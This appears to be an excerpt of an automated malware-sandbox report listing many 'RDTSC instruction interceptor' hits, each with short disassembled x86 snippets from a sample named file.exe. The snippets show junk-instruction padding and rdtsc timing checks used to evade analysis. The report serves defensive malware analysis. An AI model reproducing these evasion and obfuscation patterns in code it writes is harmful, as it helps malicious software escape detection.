          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80130 second address: 4A801B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B18E88FF7h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr fs:[00000000h] 0x00000014 jmp 00007F6B18E88FEBh 0x00000019 nop 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F6B18E88FF4h 0x00000021 or eax, 2C27DA58h 0x00000027 jmp 00007F6B18E88FEBh 0x0000002c popfd 0x0000002d mov bx, cx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 movsx edx, si 0x00000036 movzx eax, di 0x00000039 popad 0x0000003a nop 0x0000003b jmp 00007F6B18E88FEFh 0x00000040 sub esp, 18h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov ax, di 0x00000049 popad 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A801B1 second address: 4A801F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F6B19184AC0h 0x0000000f push eax 0x00000010 jmp 00007F6B19184ABBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ecx, edx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A801F3 second address: 4A801FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A801FB second address: 4A80209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80209 second address: 4A8020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8020D second address: 4A80211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80211 second address: 4A80217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80217 second address: 4A8021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8021D second address: 4A80221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80221 second address: 4A8025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 pushfd 0x00000012 jmp 00007F6B19184AC1h 0x00000017 sub ecx, 075F2E26h 0x0000001d jmp 00007F6B19184AC1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8025D second address: 4A802AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F6B18E88FEEh 0x0000000f push eax 0x00000010 jmp 00007F6B18E88FEBh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 jmp 00007F6B18E88FF4h 0x0000001c popad 0x0000001d mov eax, dword ptr [75AF4538h] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802AC second address: 4A8030D instructions: 0x00000000 rdtsc 0x00000002 mov esi, 031644A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cx, 8621h 0x0000000d popad 0x0000000e xor dword ptr [ebp-08h], eax 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 jmp 00007F6B19184ABFh 0x0000001a popad 0x0000001b xor eax, ebp 0x0000001d jmp 00007F6B19184ABFh 0x00000022 nop 0x00000023 pushad 0x00000024 mov eax, 636D71FBh 0x00000029 pushad 0x0000002a push esi 0x0000002b pop edx 0x0000002c movzx esi, dx 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007F6B19184AC4h 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8030D second address: 4A80311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80311 second address: 4A80315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80315 second address: 4A8031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8031B second address: 4A803A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, BEh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F6B19184AC8h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F6B19184ABEh 0x0000001d xor eax, 32578138h 0x00000023 jmp 00007F6B19184ABBh 0x00000028 popfd 0x00000029 mov dx, cx 0x0000002c popad 0x0000002d mov dword ptr [ebp-18h], esp 0x00000030 jmp 00007F6B19184AC2h 0x00000035 mov eax, dword ptr fs:[00000018h] 0x0000003b pushad 0x0000003c mov cx, 4A2Dh 0x00000040 mov esi, 7B045C29h 0x00000045 popad 0x00000046 mov ecx, dword ptr [eax+00000FDCh] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F6B19184ABBh 0x00000053 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803A3 second address: 4A803BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FF4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803BB second address: 4A803CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803CB second address: 4A803CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803CF second address: 4A803D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803D5 second address: 4A80401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F6B18E8902Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B18E88FF5h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80401 second address: 4A80411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B19184ABCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70030 second address: 4A70047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FF3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70047 second address: 4A700D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F6B19184AC9h 0x00000016 or cx, AA26h 0x0000001b jmp 00007F6B19184AC1h 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 jmp 00007F6B19184ABCh 0x0000002a popad 0x0000002b sub esp, 2Ch 0x0000002e jmp 00007F6B19184AC7h 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 mov dx, ax 0x00000038 push eax 0x00000039 push edx 0x0000003a mov cx, 8E7Dh 0x0000003e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A700D2 second address: 4A7014E instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F6B18E88FEFh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6B18E88FF4h 0x00000016 or al, FFFFFFB8h 0x00000019 jmp 00007F6B18E88FEBh 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 mov bh, ah 0x00000026 mov edi, 261C9F00h 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F6B18E88FF6h 0x00000032 xchg eax, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F6B18E88FF7h 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7014E second address: 4A70154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70154 second address: 4A70158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70158 second address: 4A7015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A701CA second address: 4A701CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A701CE second address: 4A701D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A701D4 second address: 4A7027B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B18E88FEBh 0x00000009 jmp 00007F6B18E88FF3h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 je 00007F6B18E891B8h 0x00000018 pushad 0x00000019 mov eax, 7ABF9D3Bh 0x0000001e pushfd 0x0000001f jmp 00007F6B18E88FF0h 0x00000024 or eax, 777F4B88h 0x0000002a jmp 00007F6B18E88FEBh 0x0000002f popfd 0x00000030 popad 0x00000031 lea ecx, dword ptr [ebp-14h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F6B18E88FEBh 0x0000003d jmp 00007F6B18E88FF3h 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007F6B18E88FF8h 0x00000049 sub cx, C048h 0x0000004e jmp 00007F6B18E88FEBh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70339 second address: 4A70340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 18h 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70340 second address: 4A70345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70345 second address: 4A703E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F6B19184AC7h 0x00000010 jg 00007F6B8A1B2BDBh 0x00000016 jmp 00007F6B19184AC6h 0x0000001b js 00007F6B19184AFFh 0x00000021 jmp 00007F6B19184AC0h 0x00000026 cmp dword ptr [ebp-14h], edi 0x00000029 pushad 0x0000002a mov cx, 00ADh 0x0000002e jmp 00007F6B19184ABAh 0x00000033 popad 0x00000034 jne 00007F6B8A1B2BA5h 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F6B19184ABEh 0x00000041 sbb ch, 00000078h 0x00000044 jmp 00007F6B19184ABBh 0x00000049 popfd 0x0000004a popad 0x0000004b mov ebx, dword ptr [ebp+08h] 0x0000004e pushad 0x0000004f mov cx, di 0x00000052 mov edx, 394604F2h 0x00000057 popad 0x00000058 lea eax, dword ptr [ebp-2Ch] 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A703E8 second address: 4A703EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A703EC second address: 4A703F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A703F2 second address: 4A7043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6B18E88FF3h 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f pushad 0x00000010 push ecx 0x00000011 mov bx, C150h 0x00000015 pop edi 0x00000016 call 00007F6B18E88FF6h 0x0000001b mov ah, B9h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov dword ptr [esp], esi 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop esi 0x00000027 mov al, dl 0x00000029 popad 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7043B second address: 4A70441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70441 second address: 4A70445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70445 second address: 4A7049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c mov eax, 54837D09h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F6B19184AC4h 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c mov ax, 25EDh 0x00000020 mov si, 33E9h 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F6B19184ABFh 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F6B19184AC0h 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7049E second address: 4A704AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60D7D second address: 4A60D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60D82 second address: 4A60E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F6B18E88FF8h 0x0000000d mov ebp, esp 0x0000000f jmp 00007F6B18E88FF0h 0x00000014 xchg eax, ecx 0x00000015 jmp 00007F6B18E88FF0h 0x0000001a push eax 0x0000001b jmp 00007F6B18E88FEBh 0x00000020 xchg eax, ecx 0x00000021 jmp 00007F6B18E88FF6h 0x00000026 mov dword ptr [ebp-04h], 55534552h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F6B18E88FEDh 0x00000036 add si, 9DD6h 0x0000003b jmp 00007F6B18E88FF1h 0x00000040 popfd 0x00000041 movzx ecx, dx 0x00000044 popad 0x00000045 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AB2 second address: 4A70AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AB8 second address: 4A70ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70B92 second address: 4A70B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70B98 second address: 4A70BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 67D70FA3h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70BB5 second address: 4A70BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70BB9 second address: 4A70BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70BD3 second address: 4A70C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1279938Bh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6B19184AC4h 0x00000017 or si, B128h 0x0000001c jmp 00007F6B19184ABBh 0x00000021 popfd 0x00000022 popad 0x00000023 call 00007F6B8A1A9A17h 0x00000028 push 75A92B70h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov eax, dword ptr [esp+10h] 0x00000038 mov dword ptr [esp+10h], ebp 0x0000003c lea ebp, dword ptr [esp+10h] 0x00000040 sub esp, eax 0x00000042 push ebx 0x00000043 push esi 0x00000044 push edi 0x00000045 mov eax, dword ptr [75AF4538h] 0x0000004a xor dword ptr [ebp-04h], eax 0x0000004d xor eax, ebp 0x0000004f push eax 0x00000050 mov dword ptr [ebp-18h], esp 0x00000053 push dword ptr [ebp-08h] 0x00000056 mov eax, dword ptr [ebp-04h] 0x00000059 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000060 mov dword ptr [ebp-08h], eax 0x00000063 lea eax, dword ptr [ebp-10h] 0x00000066 mov dword ptr fs:[00000000h], eax 0x0000006c ret 0x0000006d jmp 00007F6B19184AC5h 0x00000072 sub esi, esi 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 pushad 0x00000078 popad 0x00000079 mov ebx, esi 0x0000007b popad 0x0000007c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70C35 second address: 4A70C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FEEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CB3 second address: 4A70CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 pushad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80923 second address: 4A80967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F6B18E88FEEh 0x00000010 je 00007F6B89E96A55h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6B18E88FF7h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80967 second address: 4A8096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8096D second address: 4A80971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80971 second address: 4A8099D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6B19184AC0h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8099D second address: 4A809A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A809A3 second address: 4A809A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A809A9 second address: 4A809AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A809AD second address: 4A809C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F6B8A1AA598h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A809C1 second address: 4A809C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A809C5 second address: 4A809D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A809D6 second address: 4A80A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B18E88FF7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007F6B18E88FF4h 0x00000013 push eax 0x00000014 jmp 00007F6B18E88FEBh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6B18E88FF5h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80A76 second address: 4A80A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 47AE59ABh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F6B19184AC1h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edi, 3588304Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80A9E second address: 4A80AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80AA3 second address: 4A80AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80AA9 second address: 4A80AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80AEB second address: 4A80AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80AEF second address: 4A80AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDE278 second address: 5DDE282 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDDADB second address: 5DDDAE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F53C54 second address: 5F53C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F53C63 second address: 5F53C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F53C69 second address: 5F53C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
